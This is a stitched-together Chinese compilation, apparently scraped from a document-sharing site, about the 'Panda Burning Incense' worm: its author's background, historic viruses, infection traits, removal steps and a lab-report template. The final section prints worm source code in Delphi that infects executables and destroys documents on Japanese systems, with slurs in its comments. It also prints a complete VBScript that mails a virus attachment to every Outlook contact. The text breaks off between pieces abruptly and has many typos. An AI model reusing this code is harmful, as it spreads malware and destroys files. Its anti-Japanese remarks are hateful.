李俊的父亲则说,四五岁时,李俊爱上了玩积木及拆卸家中的小机械,那时候,李俊将家中的收音机、闹钟、手电筒等凡是能拆开的物品,都拆成一个个零部件,歪着脑袋观察每个零部件后,又将零部件重新组装起来,恢复原样。
如果闹钟再次走动或收音机能发出声音时,李俊往往会拍手大笑,自顾自庆祝半天。
李俊的弟弟李明比他小三岁,西南民族大学音乐教育专业学生,今年放寒假回家,他偶尔和哥哥提起最近他和同学都中过的“熊猫烧香”电脑病毒。
哥哥听说后却一改以往的内向和谦卑,不屑一故地笑说:“这病毒没什么大不了。
”当时李明并没有想到,他的哥哥就是“熊猫烧香”的始作俑者。
李明告诉记者,哥哥在上学时数学和英语非常优秀,尽管如此,哥哥还是没能考上高中,而是进了水泥厂里自办的一所技校(现已改名为“娲石职业技术学校”),后于2 000年到武汉一家电脑城打工后,自己有了收入,但他很少给家人钱花。
世界上电脑病毒20种介绍大全
世界上电脑病毒20种介绍大全你知道世界上有多少种电脑病毒吗!下面由店铺为您提供世界上电脑病毒20种介绍大全,希望能帮助您。
世界上电脑病毒20种介绍大全:1.Creeper(1971年)最早的计算机病毒Creeper(根据老卡通片《史酷比(Scooby Doo )》中的一个形象命名)出现在1971年,距今以后42年之久。
当然在那时,Creeper还尚未被称为病毒,因为计算机病毒尚不存在。
Creeper由BBN技术公司程序员罗伯特•托马斯(Robert Thomas)编写,通过阿帕网( ARPANET,互联网前身)从公司的DEC PDP-10传播,显示“我是Creeper,有本事来抓我呀!(I'm the creeper, catch me if you can!)”。
Creeper在网络中移动,从一个系统跳到另外一个系统并自我复制。
但是一旦遇到另一个Creeper,便将其注销。
2.Elk Cloner病毒(1982年)里奇•斯克伦塔(Rich Skrenta)在一台苹果计算机上制造了世界上第一个计算机病毒。
1982年,斯克伦塔编写了一个通过软盘传播的病毒,他称之为“Elk Cloner”,那时候的计算机还没有硬盘驱动器。
该病毒感染了成千上万的机器,但它是无害的:它只是在用户的屏幕上显示一首诗,其中有两句是这样的:“它将进入你所有的磁盘/它会进入你的芯片。
”3.梅利莎 (Melissa,1999年)Melissa病毒由大卫•史密斯(David L. Smith)制造,是一种迅速传播的宏病毒,它作为电子邮件的附件进行传播,梅丽莎病毒邮件的标题通常为“这是你要的资料,不要让任何人看见(Here is that document you asked for,don't show anybody else)”。
一旦收件人打开邮件,病毒就会自我复制,向用户通讯录的前50位好友发送同样的邮件。
因为它发出大量的邮件形成了极大的电子邮件信息流,它可能会使企业或其它邮件服务端程序停止运行,尽管Melissa病毒不会毁坏文件或其它资源。
Nimaya(熊猫烧香)病毒特点及解决方法
Nimaya(熊猫烧香)病毒特点及解决方法近期校园网中大量的出现了“熊猫烧香”病毒及其新变种,现将新变种的特征和感染现象作出分析,供大家在工作中参考。
一.感染现象及传播途径“熊猫烧香”及其变种是通过局域网内的网络共享来感染终端计算机的蠕虫病毒,主要感染的目标系统为windows 2000 和XP。
病毒会在系统的所以盘符或最后一个盘符下生成一个熊猫烧香或常见可执行文件的图标(如杀毒软件等),文件名为setup.exe/gamesetup.exe/autorun.exe等的可执行文件来诱导用户点击执行,释放后继而感染word、execl等后缀名为.exe的文件,使用户无法正常应用工作软件。
该病毒修改文件夹属性使“显示所有隐藏文件”和“显示受保护的系统文件选项”失效。
二.病毒特点1、病毒感染终端后将自身复制到Windows文件夹下,文件名为:%SystemRoot%\autorun.inf 并将其属性改为隐藏2、病毒感染终端后,病毒将病毒体复制到为以下文件:%SystemRoot%\setup.exe并将其属性改为隐藏3、病毒在每个分区下生成gamesetup.exe/set.exe/autorun.exe文件,并在C:\Documents and Settings\Administrator\Local Settings\Temp下加载zt.exe和w1.exe或ztw1.exe等文件4、病毒会在c:\winnt\system32\drivers\文件夹下生成spoclv.exe文件。
5、病毒通过添加如下注册表项实现病毒开机自动运行:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "load"="C:\\WINNT\\zt.exe"或w1.ext””[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows] "load"="C:\\WINNT\\rundl132.exe"7、枚举以下杀毒软件进程名,查找到后终止其进程:Ravmon.exe、Eghost.exe、Mailmon.exe、KA VPFW.EXE、IPARMOR.EXE、Ravmond.exe、KV、Mcshield.exe8、同时病毒尝试利用以下命令终止相关杀病毒软件并删除服务:net stop "Kingsoft AntiVirus Service"net stop “Ravservice”9、发送arp探测数据,判断网络状态,网络可用时,枚举内网所有共享主机,并使用自带的口令库猜测破解\\IPC$、\admin$等共享目录,连接成功后进行网络感染。
熊猫烧香.ppt
中毒症状
除通过网站带毒感染用 户之外,此病毒还会在 局域网中传播,在极短 时间之内就可以感染几 千台计算机,严重时可 以导致网络瘫痪。中毒 电脑上会出现“熊猫烧 香”图案,所以也被称 为“熊猫烧香”病毒。 中毒电脑会出现蓝屏、 频繁重启以及系统硬盘 中数据文件被破坏等现 象
应对方法
虽然用户及时更新杀毒软件病毒库,并下载各杀毒软件公 司提供的专杀工具,即可对“熊猫烧香”病毒进行查杀, 但是如果能做到防患于未然岂不更好。 立即检查本机administrator 组成员口令,一定要放弃简 单口令甚至空口令,安全的口令是字母数字特殊字符的组 合,自己记得住,别让病毒猜到就行。Biblioteka 世界十大病毒——熊猫烧香
制作人:洪可盈
什么是熊猫烧香?
其实是一种蠕虫病毒的变种,熊 猫烧香 而且是经过多次变种而 来的,由于中毒电脑的可执行文 件会出现“熊猫烧香”图案,所 以也被称为 “熊猫烧香”病毒。 但原病毒只会对 EXE 图标进行替 换,并不会对系统本身进行破坏。 而大多数是中等病毒变种,用户 电脑中毒后可能会出现蓝屏、频 繁重启以及系统硬盘中数据文件 被破坏等现象。同时,该病毒的 某些变种可以通过局域网进行传 播,进而感染局域网内所有计算 机系统,最终导致企业局域网瘫 痪,无法正常使用,它能感染系 统中exe,com,pif,src,html, asp 等文件,它还能终止大量的 反病毒软件进程并且会删除扩展 名为 gho 的备份文件。被感染的 用户系统中所有 .exe 可执行文件 全部被改成熊猫举着三根香的模 样。
信息安全熊猫烧香病毒剖析
《网络攻击与防御》实验报告计算机科学与技术学院计算机系网络教研室制实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节,而实验报告的撰写又是知识系统化的吸收和升华过程,因此,实验报告应该体现完整性、规范性、正确性、有效性。
现将实验报告撰写的有关内容说明如下:1、实验报告模板为电子版。
2、下载统一的实验报告模板,学生自行完成撰写和打印。
报告的首页包含本次实验的一般信息:组号:例如:2-5 表示第二班第5组。
实验日期:例如:05-10-06 表示本次实验日期。
(年-月-日)……实验编号:例如:表示第一个实验。
实验时间:例如:2学时表示本次实验所用的时间。
实验报告正文部分,从六个方面(目的、内容、步骤等)反映本次实验的要点、要求以及完成过程等情况。
模板已为实验报告正文设定统一格式,学生只需在相应项内填充即可。
续页不再需要包含首页中的实验一般信息。
3、实验报告正文部分具体要求如下:一、实验目的本次实验所涉及并要求掌握的知识点。
二、实验环境实验所使用的设备名称及规格,网络管理工具简介、版本等。
三、实验内容与实验要求实验内容、原理分析及具体实验要求。
四、实验过程与分析根据具体实验,记录、整理相应命令、运行结果等,包括截图和文字说明。
详细记录在实验过程中发生的故障和问题,并进行故障分析,说明故障排除的过程及方法。
五、实验结果总结对实验结果进行分析,完成思考题目,总结实验的心得体会,并提出实验的改进意见。
1)掌握熊猫烧香病毒的工作原理和感染方法;2)掌握手工清除熊猫病毒的基本方法。
目标主机为windows-2003所用到的工具o Wsyschecko Filemon三、实验内容与实验要求蠕虫原理1)蠕虫定义2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。
这一病毒利用了微软视窗操作系统的漏洞,计算机感染这一病毒后,会不断自动拨号上网,并利用文件中的地址信息或者网络共享进行传播,最终破坏用户的大部分重要数据。
计算机病毒-熊猫烧香知识科普
计算机病毒-熊猫烧香知识科普今天店铺要跟大家讲解下计算机病毒史中非常出名的“熊猫烧香”,下面就是店铺为大家整理到的资料,请大家认真看看!计算机病毒-熊猫烧香知识科普熊猫烧香跟灰鸽子不同,这是名副其实的病毒,是一种经过多次变种的“蠕虫病毒”变种,2006年10月16日由25岁的中国湖北武汉新洲区人李俊编写,拥有感染传播功能,2007年1月初肆虐网络,它主要通过下载的档案传染,受到感染的机器文件因为被误携带间接对其它计算机程序、系统破坏严重。
2013年6月病毒制造者张顺和李俊伙同他人开设网络赌场案,再次获刑。
病毒原理其实是一种蠕虫病毒的变种,而且是经过多次变种而来的,由于中毒电脑的可执行文件会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。
但原病毒只会对EXE图标进行替换,并不会对系统本身进行破坏。
而大多数是中等病毒变种,用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。
同时,该病毒的某些变种可以通过局域网进行传播,进而感染局域网内所有计算机系统,最终导致企业局域网瘫痪,无法正常使用,它能感染系统中exe,com,pif,src,html,asp等文件,它还能终止大量的反病毒软件进程并且会删除扩展名为gho的备份文件。
被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
中毒症状除通过网站带毒感染用户之外,此病毒还会在局域网中传播,在极短时间之内就可以感染几千台计算机,严重时可以导致网络瘫痪。
中毒电脑上会出现“熊猫烧香”图案,所以也被称为“熊猫烧香”病毒。
中毒电脑会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。
病毒危害病毒会删除扩展名为gho的文件,使用户无法使用ghost软件恢复操作系统。
“熊猫烧香”感染系统的.exe .com. f.src .html.asp文件,添加病毒网址,导致用户一打开这些网页文件,IE就会自动连接到指定的病毒网址中下载病毒。
“熊猫烧香”病毒的清除方法
“熊猫烧香”病毒的清除方法可恶的病毒“熊猫烧香”,一查居然是2007 年第一周排行榜第一的病毒。
这个病毒Windows 和常用的系统组件,如IE、Messenger 等的运行倒没有多大影响,但是它会自行搜索硬盘上扩展名为 .EXE、.HTM、.ASP、.CHM 等几种类型的文件,把这些文件当作宿主,寄生在这些文件里。
一旦这几种类型的文件被感染,文件的图标就会变成一个很恶心的烧香熊猫的样子,同时文件大小变大(病毒已经寄生在其中),只要试图运行这些中毒的文件,病毒就会进一步地疯狂扩散。
受病毒的影响,几乎所有的应用软件基本上都不能正常运行了(哪个软件的执行文件不是 .EXE 文件呢)。
而且病毒还具有自行关闭防火墙和杀毒软件的能力,电脑上的瑞星防火墙便被强制禁用,病毒监控虽然可以运行,但也被取消了随系统启动一同加载的权利;同时连 Windows 安全中心也未能幸免,Security Center 服务被整个删除;另外在文件夹选项中也无法查看隐藏的文件夹和文件了,这是一个常见问题,在文件夹选项中设置“显示所有文件夹和文件”后无法保存设置。
和这个病毒纠缠了两天,过程就不说了,说说怎么清理它吧。
由于瑞星已经“泥菩萨过河、自身难保”,所以不得不手动清除。
1.在任务管理器的进程列表中关闭 SPCOLSV.EXE 病毒进程。
这个SPCOLSV.EXE 明显是在模仿系统进程 SPOOLSV.EXE。
2.删除位于%SystemRoot%system32Drivers 文件夹中的SPCOLSV.EXE 文件。
%SystemRoot%system32Drivers 文件夹中不应该存在 .EXE 文件,所以很好找。
3.按照KB555640 提供的方法,恢复资源管理器不能显示隐含文件的问题:4.每个硬盘分区的根目录都有两个隐含的文件AUTORUN.INF 和SETUP.EXE,将这些垃圾全部删除。
5.在注册表HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersio nRun 中把病毒的启动项 svcshare 删除。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
(一) 主程序段分析原“熊猫烧香”病毒“源码”主程序段代码如下所示:{==================主程序开始====================}beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之?end;//如果是原始病毒体自己if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 thenInfectFiles //感染和发邮件else //已寄生于宿主程序上了,开始工作beginTmpFile := ParamStr(0); //创建临时文件……....Line nDelete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,0, nil, '.', Si, Pi); //创建新进程运行之……....Line n+7InfectFiles; //感染和发邮件end;end.对于代码:RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程虽然源码提供者省略了相应实现,但这是比较基本的编程实现。
通过把自身注册为服务进程,可以使自己随着系统的启动一起启动。
当然,还可以进一步施加技巧而使自己从Windows 任务管理器下隐藏显示。
然后,上面代码在判断当前操作系统不是Win9X后,提到“远程线程映射到Explorer进程”一句。
其实这里所用Jeffrey Richter所著《Windows 95 Windows NT 3.5 高级编程技术》(后多次更句)一书第16章“闯过进程的边界”中详细讨论的“使用远程线来注入一个DLL”技术。
如今,只要上网GOOGLE一下“远程线程映射技术”即出现大量实片断,故在不再赘述。
那么,它(包括其它许多病毒)为什么要映射到Explorer进程呢?原来,Explorer(注:Windows资源管理器的名字也是Explorer.exe,但并不是一回事!)进程在Windows系统中举足轻重—Windows在启动过程中都会随同激活一个名为Explorer.exe的进程。
它用于管理Windows图形外壳,包括开始菜单、任务栏、桌面和文件管理等,损坏或删除该程序会导致Windows图形界面无法适用。
注:这并不是说Windows的运行根本离开它;但删除掉这个程序后,整个Windows桌面无法再用,而对于普通用户也感觉到好象法再使用Windows了。
另注:VCL函数Paramstr(n)的作用是返回当前可执行文件指定的命令行参数;当n=0时,返回当前可执行文件名(包含完整的路径)。
因此,上面代码中从n行到第n+7行的作用是,从已感染的宿主程序中分离出原无染程序代码部分,并启动此无染程序。
这是病毒的重要伪装手段之一:不是一下子使宿主中毒瘫痪,而是感染宿主使之达到继续传播目标的同时,启动另一个“原”无毒程序(实际上文件名已经改变,加了一个空格字符)。
接下来,让我们入分析上面流程中“InfectFiles(感染文件)”部分的执行过程。
(二) 具体感染文件的过程这个子过程的源码如下所示:{遍历磁盘上所有的文件并实际感染}procedure InfectFiles;varDriverList: string;i, Len: Integer;beginif GetACP = 932 then //日文操作系统。
函数GetACP用于检索系统所用语言IsJap := True; //去死吧!DriverList := GetDrives; //得到可写的磁盘列表Len := Length(DriverList);while True do //死循环beginfor i := Len downto 1 do //遍历每个磁盘驱动器LoopFiles(DriverList + ':', '*.*'); //感染之SendMail; //发带毒邮件Sleep(1000 * 60 * 5); //睡眠5分钟—病毒常用简单诈骗术之一end;end;{ === InfectFiles }这里的核心是后面的死循环。
先让我们分析较简单的“发带毒邮件”部分。
从后面病毒具体遍历可用磁盘并执行具体感染过程可知,此过程中,它会取得安装在本机中的常用邮件客户端程序(Outlook,FoxMail)相应电邮件信息。
其目的是:取得重要邮箱地址及相应密码,然后向这些邮件地址群发带毒的电子邮件,从而达到利用网络传播自身的目的。
下面是从网上摘录的一段VBScript脚本:Set objOA=Wscript.CreateObject("Outlook.Application")'创建一个OUTLOOK应用的对象Set objMapi=objOA.GetNameSpace("MAPI")'取得MAPI名字空间For i=1 to objMapi.AddressLists.Count'遍历地址簿Set objAddList=objMapi.AddressLists(i)For j=1 To objAddList. AddressEntries.CountSet objMail=objOA.CreateItem (0)objMail.Recipients.Add (objAddList. AddressEntries (j))'取得收件人邮件地址objMail.Subject="你好!"'设置邮件主题objMail.Body="这次给你的附件,是我的新文档!"'设置信件内容objMail.Attachments.Add(“c:virus.vbs")'把自己作为附件扩散出去objMail.Send'发送邮件NextNextSet objMapi=NothingSet objOA=Nothing注意,这段代码是非常基本的使用VBScript脚本操作Outlook COM对象,并进而达到通编程方式操作Outlook发送特定邮件的编程技术。
其中,最关键的一句在于:objMail.Attachments.Add(“c:virus.vbs")在此,任何一名病毒制作者都可以把这个附件文件名修改为新病毒文件自身!(三) LoopFiles子过程分析这个子程序的功能是:遍历本地磁盘,并详细实施感染及破坏过程。
在此列出其关键代码片断:{ 遍历目录,感染和摧毁文件 }procedure LoopFiles(Path, Mask: string); var//……局部变量定义Msg: TMsg;// IsValidDir判断指定对象是否是“目录”……function IsValidDir(SearchRec: TSearchRec): Integer;beginif (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) thenbeginrepeatPeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑if IsValidDir(SearchRec) = 0 thenbeginFn := Path + ;Ext := UpperCase(ExtractFileExt(Fn));if (Ext = '.EXE') or (Ext = '.SCR') then //Line XbeginInfectOneFile(Fn); //感染可执行文件endelse if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') thenbegin//感染HTML和ASP文件,将Base64编码后的病毒写入//感染浏览此网页的所有用户//哪位大兄弟愿意完成之?endelse if Ext = '.WAB' then //Outlook地址簿文件begin//获取Outlook邮件地址endelse if Ext = '.ADC' then //Foxmail地址自动完成文件begin//获取Foxmail邮件地址endelse if Ext = 'IND' then //Foxmail地址簿文件begin//获取Foxmail邮件地址endelsebeginif IsJap then //是倭文操作系统beginif (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or……thenSmashFile(Fn); //摧毁文件end;end;end;//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑Sleep(200);until (FindNext(SearchRec) <> 0);end;FindClose(SearchRec);SubDir := TStringList.Create;if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) thenbeginrepeatif IsValidDir(SearchRec) = 1 thenSubDir.Add();until (FindNext(SearchRec) <> 0);end;FindClose(SearchRec);Count := SubDir.Count - 1;for i := 0 to Count doLoopFiles(Path + SubDir.Strings + '', Mask);FreeAndNil(SubDir);end;此子过程是典型的遍历本机中所有可用盘中的所有子目录下的所有文件并施行相应操作编码。